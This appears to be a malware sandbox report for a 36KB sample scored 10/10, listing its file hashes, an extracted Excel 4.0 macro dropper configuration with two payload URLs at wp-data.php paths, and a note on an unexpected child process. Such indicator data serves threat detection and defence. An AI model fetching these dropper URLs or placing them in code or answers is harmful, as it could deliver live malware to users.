General

  • Target

    b3970659be5d7ebcfb49e251b24a795f

  • Size

    36KB

  • Sample

    240305-ddal1acf71

  • MD5

    b3970659be5d7ebcfb49e251b24a795f

  • SHA1

    afb4e951585a6325737fcbd2f09d2299c0a732d1

  • SHA256

    765a3fc715cd0a124f8f331a4f36b17b990e0aa571c7b7f97e4f3c3cef6a63b2

  • SHA512

    4dc436c923a1011a95a388778800610c6873108c92e2037687aac8d837469b05f1ef1d49ca4e7bc103dcb948b53f56e0b247c9cecf648a63db0248aa3a4ca53e

  • SSDEEP

    768:cPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ3i90UIfxSx3gB4U11CcQ2:Iok3hbdlylKsgqopeJBWhZFGkE+cL2N6

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://markens.online/wp-data.php

xlm40.dropper

https://statedauto.com/wp-data.php

Targets

    • Target

      b3970659be5d7ebcfb49e251b24a795f

    • Size

      36KB

    • MD5

      b3970659be5d7ebcfb49e251b24a795f

    • SHA1

      afb4e951585a6325737fcbd2f09d2299c0a732d1

    • SHA256

      765a3fc715cd0a124f8f331a4f36b17b990e0aa571c7b7f97e4f3c3cef6a63b2

    • SHA512

      4dc436c923a1011a95a388778800610c6873108c92e2037687aac8d837469b05f1ef1d49ca4e7bc103dcb948b53f56e0b247c9cecf648a63db0248aa3a4ca53e

    • SSDEEP

      768:cPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ3i90UIfxSx3gB4U11CcQ2:Iok3hbdlylKsgqopeJBWhZFGkE+cL2N6

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks